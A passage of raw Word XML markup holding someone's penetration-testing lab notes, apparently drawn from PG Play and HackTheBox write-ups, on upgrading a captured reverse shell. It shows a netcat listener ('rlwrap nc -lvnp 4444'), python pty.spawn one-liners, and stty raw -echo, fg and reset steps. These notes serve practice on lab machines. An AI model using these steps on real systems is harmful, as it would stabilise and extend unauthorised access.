    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="219"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the "sh" alternative</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty raw -echo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's an example from this </w:t>
      </w:r>
      <w:hyperlink r:id="rId332">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Katana</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play writeup</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export TERM=xterm-256color</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I then used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl+Z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to background the process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty raw -echo ; fg ; reset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FE9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty columns 200 rows 200</w:t>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t xml:space="preserve">Here's what they do in HTB:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nc -lvnp 4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FEE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1403"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty; pty.spawn("/bin/sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1403"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the "sh" alternative</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ctrl+z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty raw -echo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xterm</w:t>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Here's another one:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty;pty.spawn("/bin/bash")'      </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1404"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty; pty.spawn("/bin/sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1404"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the "sh" alternative</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                     </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FFB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export TERM=xterm                                                                                        </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + Z                                                                                                 </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FFD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty raw -echo; fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FFE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000FFF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Python:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once inside a machine, run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which python</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see if python installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001001">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which python2 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which python3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001002">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run interactive shell:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> python -c "import pty; pty.spawn('bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001003">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If python doesn't work, try python 2 or 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001004">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001005">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 -c 'import pty;pty.spawn("/bin/sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001007">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="620"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import pty;pty.spawn("/bin/sh")'</w:t>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rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After using Python, here's how to use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to allow copy and paste and tab autocomplete:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000100A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="660"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty raw -echo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000100B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="660"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">raw: Passes input directly to the shell without processing it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000100C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="660"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo: Prevents your input from being echoed (displayed) back.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000100D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="660"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000100E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="660"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This enables advanced terminal features like cursor movement, colors, and line editing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000100F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="660"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + Z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to background the shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001010">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="660"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which gets the most recent shell from background</w:t>
      </w:r>
    </w:p>
